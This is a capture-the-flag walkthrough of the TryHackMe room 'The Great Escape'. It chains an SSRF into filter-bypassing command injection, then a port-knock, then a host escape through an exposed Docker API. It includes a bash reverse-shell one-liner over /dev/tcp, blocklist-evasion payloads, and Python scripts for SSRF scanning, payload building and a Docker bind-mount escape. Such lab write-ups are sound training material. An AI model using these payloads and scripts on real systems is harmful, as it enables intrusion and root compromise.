The Great Escape

Penthos
Aug 13, 2021

Room link: https://tryhackme.com/room/thegreatescape

Enum

Nmap

PORT   STATE SERVICE
22/tcp open ssh
80/tcp open http

22/tcp open ssh?
| fingerprint-strings:
| GenericLines:
|_ m6"<
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open http nginx 1.19.6
|_http-favicon: Unknown favicon MD5: 67EDB7D39E1376FDD8A24B0C640D781E
| http-methods:
|_ Supported Methods: HEAD
| http-robots.txt: 3 disallowed entries
|_/api/ /exif-util /*.bak.txt$
|_http-server-header: nginx/1.19.6
|_http-title: docker-escape-nuxt
|_http-trane-info: Problem with XML parsing of /evox/about

Port 80

Main page

/robots.txt

SSRF

Following the /exif-util hint from robots.txt leads to the /api/exif?url= endpoint, which fetches whatever URL it is given on the server side, so it is vulnerable to SSRF.

Sending the request to Burp Intruder, I fuzzed the port number in the URL to see what was reachable internally.

Intruder setup

Results

I found port 8080 to be open internally.
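The Intruder run above is a differential scan: every probed port goes through the same SSRF endpoint, and the ones worth looking at are those whose response does not look like a closed port. The script below is an added example (not code from the write-up) that does the same thing from the command line. The endpoint is the one from the write-up; the target IP, the probed host name, the port list and the choice of port 1 as the known-closed baseline are assumptions to adjust.

```python
"""Internal port discovery through the /api/exif?url= SSRF (added example)."""
import urllib.error
import urllib.parse
import urllib.request
from dataclasses import dataclass
from typing import Iterable, List

TARGET = "http://10.10.31.233"              # box IP from the write-up; changes per deployment
SSRF_ENDPOINT = TARGET + "/api/exif?url="   # endpoint from the write-up
TIMEOUT = 5.0                               # assumed; closed internal ports may hang until this


@dataclass(frozen=True)
class Probe:
    inner: str      # the internal URL we asked the server to fetch
    port: int
    status: int     # HTTP status the front-end returned to us (0 = network error / timeout)
    body: str       # response body, decoded leniently


def inner_url(host: str, port: int) -> str:
    return f"http://{host}:{port}/"


def probe_url(host: str, port: int) -> str:
    """Outer request URL. The inner URL is percent-encoded once so that ':',
    '/' and '?' survive the front-end's own query-string parsing."""
    return SSRF_ENDPOINT + urllib.parse.quote(inner_url(host, port), safe="")


def probe(host: str, port: int) -> Probe:
    """Send one SSRF request and capture status + body (network call)."""
    inner = inner_url(host, port)
    req = urllib.request.Request(probe_url(host, port), headers={"User-Agent": "ssrf-scan"})
    try:
        with urllib.request.urlopen(req, timeout=TIMEOUT) as resp:
            return Probe(inner, port, resp.getcode(), resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as e:
        return Probe(inner, port, e.code, e.read().decode("utf-8", "replace"))
    except (urllib.error.URLError, OSError):
        return Probe(inner, port, 0, "")


def signature(p: Probe) -> tuple:
    """Status plus body length with the echoed inner URL removed, so error pages
    that merely quote back the URL we sent compare equal across ports."""
    return (p.status, len(p.body.replace(p.inner, "")))


def classify(baseline: Probe, probes: Iterable[Probe]) -> List[int]:
    """Ports whose response differs from the known-closed baseline."""
    base = signature(baseline)
    return [p.port for p in probes if signature(p) != base]


def scan(host: str, ports: Iterable[int], closed_port: int = 1) -> List[int]:
    """Differential scan: probe a port assumed closed first, then flag every
    port that does not look like it (network calls)."""
    baseline = probe(host, closed_port)
    return classify(baseline, (probe(host, p) for p in ports))


if __name__ == "__main__":
    # Same idea as the Intruder run above; on this box the dev backend answered on 8080.
    print(scan("127.0.0.1", [80, 443, 3000, 5000, 8000, 8080, 8443, 9000]))
```

Comparing against a baseline rather than looking for HTTP 200 matters here: the front-end usually returns its own status code regardless of what the internal fetch did, so the signal is in the body (and in timeouts), not in the outer status line.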

Looking at robots.txt again I noticed another hint.

# Disallow: /exif-util
Disallow: /*.bak.txt$

/exif-util.bak.txt

The backup file reveals a new endpoint, presumably the call the front-end makes to the internal dev backend on port 8080. Let's request it through the SSRF and see what comes back.

http://api-dev-backup:8080/exif

Chaining the two: the public /api/exif endpoint fetches the internal backend on port 8080, which takes its own url parameter. Pointing that parameter at a local file gave a different response, an error about banned words.

http://10.10.31.233/api/exif?url=http://api-dev-backup:8080/exif?url=/etc/passwd

The backend evidently hands the url value to a shell, so command injection with a ; separator is worth a try.

http://10.10.183.57/api/exif?url=http://api-dev-backup:8080/exif?url=;ls -la

I was still blocked on the banned words, so I tried a few tricks from here: https://book.hacktricks.xyz/linux-unix/useful-linux-commands/bypass-bash-restrictions

That let me bypass the bad-word filter with a simple pair of empty quotes ('') inside the blocked word.

Using this technique I started to enum the system before I attempted to get a reverse shell.

Bypass chars

$IFS      # replaces a space (also ${IFS})
''        # empty string inside a word: the shell drops it, the filter sees a different word
Eg:
exif?url=;cat$IFS/etc/pas''swd
exif?url=;cat${IFS}/etc/pas''swd

Further testing and results.

Sent: http://10.10.183.57/api/exif?url=http://api-dev-backup:8080/exif?url=;id
Response: uid=0(root) gid=0(root) groups=0(root)

Sent: http://10.10.183.57/api/exif?url=http://api-dev-backup:8080/exif?url=;hostname
Response: api-dev-backup

User

Some more enumeration of the main site turned up an interesting path.

dirb http://10.10.16.111/ /usr/share/seclists/Discovery/Web-Content/common.txt

Requesting that path with curl returns the user flag.

Root (Docker Container)

I started crafting a reverse-shell payload that would get past the word filter.

a="ba";b="sh";echo "$a$b -c '$a$b -i >& /dev/tcp/10.8.153.120/9999 0>&1'"

This also failed. Looking again, I worked out that it is best to close off the first command: the url value is handed to curl, which is the first command to run, so an empty argument followed by a semicolon ('';) terminates that curl call and whatever comes next runs as its own command.

'';/bin/ba''sh -c "id"
http://10.10.3.112/api/exif?url=http://api-dev-backup:8080/exif?url='';id
Retrieved Content
----------------------------------------
uid=0(root) gid=0(root) groups=0(root)
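The bypass tricks above (the '' splice, ${IFS} for spaces, and the '';  prefix that closes off curl) are easy to get wrong by hand once the command grows. The following is an added example, not code from the write-up, that mechanises them and builds the nested request URL. The endpoints and internal hostname are from the write-up; the target IP and the blocklist (the backend's real list is never shown, so BANNED is seeded with the words the write-up had to split) are assumptions. The write-up sent the inner URL unencoded; the builder encodes it in two layers, once for the front-end and once for the backend, which is the form that survives stricter query parsing.

```python
"""Filter-bypass payload builder for the api-dev-backup command injection (added example)."""
import subprocess
import urllib.parse
from typing import Iterable

TARGET = "http://10.10.3.112"                       # box IP from the write-up
OUTER = TARGET + "/api/exif?url="                   # public SSRF endpoint
INNER = "http://api-dev-backup:8080/exif?url="      # internal dev backend
BANNED = ("passwd", "bash", "shadow")               # assumed blocklist


def split_word(word: str) -> str:
    """'passwd' -> "pas''swd": the shell removes the empty string, so the word
    executes intact but never appears verbatim in the request."""
    mid = len(word) // 2
    return word[:mid] + "''" + word[mid:]


def obfuscate(command: str, banned: Iterable[str] = BANNED) -> str:
    """Rewrite a shell command to get past a naive substring blocklist and a
    space filter: blocked words are split with '', spaces become ${IFS}.
    Works for unquoted commands; text inside single quotes is not expanded."""
    out = command
    for word in sorted(banned, key=len, reverse=True):   # longest first
        out = out.replace(word, split_word(word))
    return out.replace(" ", "${IFS}")


def injection(command: str) -> str:
    """Full value for the inner url parameter: '' then ; ends the curl the
    backend runs, then our command executes on its own."""
    return "'';" + obfuscate(command)


def request_url(command: str) -> str:
    """Outer URL with two layers of percent-encoding: the front-end decodes
    once and forwards the inner URL, the backend decodes once more and gets
    the raw payload."""
    inner = INNER + urllib.parse.quote(injection(command), safe="")
    return OUTER + urllib.parse.quote(inner, safe="")


def run_locally(payload: str) -> str:
    """Sanity-check an obfuscated command in a local POSIX sh (no target needed)."""
    res = subprocess.run(["sh", "-c", payload], capture_output=True, text=True, timeout=10)
    return res.stdout


if __name__ == "__main__":
    for cmd in ("id", "hostname", "cat /etc/passwd", "/bin/bash -c id"):
        print(injection(cmd))
        print(request_url(cmd))
```

run_locally is there to prove the rewriting is shell-correct before you send it: if a payload misbehaves locally it will not do better on the target, where the only feedback is the backend's "Retrieved Content" block.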

After many attempts to get a reverse shell, I realised it was not going to happen, so I fell back to manual enumeration through the injection.

Since the injected commands already run as root, I started in /root.

dev-note.txt

Hey guys,

Apparently leaving the flag and docker access on the server is a bad idea, or so the security guys tell me. I've deleted the stuff.

Anyways, the password is fluffybunnies123

Cheers,
Hydra

/root also contains a git repository, so let's enumerate that too: files deleted from the working tree are still in the history.

http://10.10.3.112/api/exif?url=http://api-dev-backup:8080/exif?url='';cd /root; git log

Let's look at the diff for each commit ID.

http://10.10.3.112/api/exif?url=http://api-dev-backup:8080/exif?url='';cd /root; git show 4530ff7f56b215fa9fe76c4d7cc1319960c4e539

Awesome! The commit diff gives us the flag and a hint that the Docker TCP port can be opened by port knocking.

Port Knocking (root flag)

Ports to knock.

knock 10.10.3.112 42 1337 10420 6969 63000

Before

PORT     STATE SERVICE
22/tcp open ssh
80/tcp open http

After

PORT     STATE SERVICE
22/tcp open ssh
80/tcp open http
2375/tcp open docker
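The knock client is a one-liner, but it is worth seeing what it actually does: one TCP connection attempt per port, in order, and then a check of the port the sequence is supposed to open. The script below is an added example, not from the write-up; the sequence and host come from the git hint above, while the delay between knocks and the one-second timeout are assumptions (a knock daemon only needs to see the SYN, so refused or filtered results on the knock ports are expected).

```python
"""Port knocking with plain TCP connects, then checking for tcp/2375 (added example)."""
import socket
import time
from typing import Iterable, List, Tuple

KNOCK_SEQUENCE = (42, 1337, 10420, 6969, 63000)   # from the git history hint
DOCKER_PORT = 2375


def tcp_state(host: str, port: int, timeout: float = 1.0) -> str:
    """'open' (connect succeeded), 'closed' (RST received) or 'filtered'
    (timeout / unreachable), the same three states nmap reports."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "open"
    except ConnectionRefusedError:
        return "closed"
    except (socket.timeout, OSError):
        return "filtered"


def knock(host: str, sequence: Iterable[int], delay: float = 0.3,
          timeout: float = 1.0) -> List[Tuple[int, str]]:
    """Touch each port in order. Order is what the daemon checks; the result
    of each individual connect does not matter."""
    results = []
    for port in sequence:
        results.append((port, tcp_state(host, port, timeout)))
        time.sleep(delay)
    return results


def knock_and_check(host: str, sequence: Iterable[int] = KNOCK_SEQUENCE,
                    target: int = DOCKER_PORT) -> Tuple[str, str]:
    """State of the target port before and after the sequence."""
    before = tcp_state(host, target)
    knock(host, sequence)
    after = tcp_state(host, target)
    return before, after


if __name__ == "__main__":
    print(knock_and_check("10.10.3.112"))   # expected on the box: ('filtered', 'open') or ('closed', 'open')
```

If the port does not open, re-run with a longer delay: knock daemons process the sequence from packet captures or firewall logs and can miss knocks sent back to back.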

Now we have a new port open, time to connect and see what is on it. Port 2375 is the Docker daemon's plain-TCP API: no authentication, no TLS, and the daemon runs as root on the host, so anyone who can reach it can start containers with the host filesystem mounted.

Using the info here: https://book.hacktricks.xyz/pentesting/2375-pentesting-docker, it was easy to enumerate the target.

curl -s http://10.10.3.112:2375/version | jq
# or
docker -H 10.10.3.112:2375 version
docker -H 10.10.3.112:2375 images

REPOSITORY                                   TAG      IMAGE ID       CREATED         SIZE
exif-api-dev                                 latest   4084cb55e1c7   7 months ago    214MB
exif-api                                     latest   923c5821b907   7 months ago    163MB
frontend                                     latest   577f9da1362e   7 months ago    138MB
endlessh                                     latest   7bde5182dc5e   7 months ago    5.67MB
nginx                                        latest   ae2feff98a0c   8 months ago    133MB
debian                                       10-slim  4a9cd57610d6   8 months ago    69.2MB
registry.access.redhat.com/ubi8/ubi-minimal  8.3      7331d26c1fdf   8 months ago    103MB
alpine                                       3.9      78a2ce922f86   15 months ago   5.55MB

After trying a few images, I found that nginx gave me an interactive shell. The host filesystem comes from the bind mount (-v /:/host), not from the image: any image that can run chroot will do, and the bash we land in is the host's own.

docker -H 10.10.3.112:2375 run --rm -it -v /:/host/ nginx chroot /host/ bash
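The docker CLI is convenient, but the daemon is just an HTTP API, and the escape above can be driven with nothing but urllib. The following is an added example (not the write-up's code) that does what `docker run --rm -v /:/host nginx chroot /host ...` does through the Docker Engine REST API: create a container with the host root bind-mounted, start it, wait for it, read its logs, delete it. The host and image name come from the write-up; the command run through chroot and the choice of reading output via the logs endpoint are assumptions. Logs are returned in Docker's multiplexed stream format when no TTY is allocated, so a small frame decoder is included.

```python
"""Host-filesystem escape through an exposed Docker daemon, via the REST API (added example)."""
import json
import urllib.request
from typing import Any, Dict, List, Optional

DOCKER_HOST = "http://10.10.3.112:2375"   # from the write-up; plain HTTP, no auth, no TLS


def api(method: str, path: str, body: Optional[Dict[str, Any]] = None) -> Any:
    """One call to the daemon. Unversioned paths mean 'newest API the daemon speaks'."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(DOCKER_HOST + path, data=data, method=method,
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=30) as resp:
        raw = resp.read()
    return json.loads(raw) if raw else None


def image_names(images_json: List[Dict[str, Any]]) -> List[str]:
    """Flatten GET /images/json output to repo:tag names (untagged images have RepoTags=None)."""
    names: List[str] = []
    for img in images_json:
        names.extend(img.get("RepoTags") or [])
    return names


def host_escape_spec(image: str, cmd: List[str]) -> Dict[str, Any]:
    """Container spec equivalent to:  docker run -v /:/host <image> chroot /host <cmd...>
    Binds mounts the host root into the container; chroot runs cmd against it.
    No --privileged is needed: the daemon itself is root on the host."""
    return {
        "Image": image,
        "Cmd": ["chroot", "/host"] + cmd,
        "HostConfig": {"Binds": ["/:/host"]},
        "AttachStdout": True,
        "AttachStderr": True,
    }


def demux(stream: bytes) -> str:
    """Decode Docker's multiplexed log stream: each frame is an 8-byte header
    [stream type, 0, 0, 0, size as 4-byte big-endian] followed by `size` payload bytes."""
    out = bytearray()
    i = 0
    while i + 8 <= len(stream):
        size = int.from_bytes(stream[i + 4:i + 8], "big")
        out += stream[i + 8:i + 8 + size]
        i += 8 + size
    return out.decode("utf-8", "replace")


def run_on_host(image: str, cmd: List[str]) -> str:
    """Create, start, wait, collect output, clean up (network calls)."""
    cid = api("POST", "/containers/create", host_escape_spec(image, cmd))["Id"]
    api("POST", f"/containers/{cid}/start")
    api("POST", f"/containers/{cid}/wait")
    req = urllib.request.Request(DOCKER_HOST + f"/containers/{cid}/logs?stdout=1&stderr=1")
    with urllib.request.urlopen(req, timeout=30) as resp:
        logs = resp.read()
    api("DELETE", f"/containers/{cid}")
    return demux(logs)


if __name__ == "__main__":
    print(image_names(api("GET", "/images/json")))
    print(run_on_host("nginx", ["id"]))   # assumed command; expected to report the host's root user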

Now we can get the real root flag and complete the box.

--

--